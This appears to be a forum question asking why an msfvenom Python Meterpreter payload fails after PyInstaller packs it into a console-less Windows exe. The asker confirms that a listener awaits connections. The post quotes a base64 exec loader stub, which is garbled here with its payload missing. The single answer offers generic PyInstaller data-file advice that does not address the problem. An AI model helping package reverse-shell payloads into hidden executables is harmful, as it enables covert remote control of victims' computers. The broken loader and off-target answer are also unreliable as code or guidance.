# Msfvenom python payload does not work when converted to exe but doe work when it's a python file

Tags: python

Msfvenom python payload does not work when converted to exe by pyinstaller but does work when it's a py file. The error is "failed to execute script" with no reason why.

where is the code

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}sys.version_info[0]))

pyinstaller commands:

C:\pycharm>C:\Python27\Scripts\pyinstaller.exe 2222.py --onefile --noconsole

and yes meterpreter is listening for incoming connections.

Answer (score 0):

Here is my answer.

Add this function at the beginning of your script :

```
import sys, os 
    def resource_path(relative_path):
        if hasattr(sys, '_MEIPASS'):
            return os.path.join(sys._MEIPASS, relative_path)
        return os.path.join(os.path.abspath("."), relative_path)
```

Refer to your data files by calling the function `resource_path()`, like this:

```
resource_path('myimage.gif')
```

Then use this command:

```
pyinstaller --onefile --windowed --add-data todo.ico;. script.py
```

For more information visit this [documentation page](http://pyinstaller.readthedocs.io/en/stable/usage.html#options-group-what-to-bundle-where-to-search).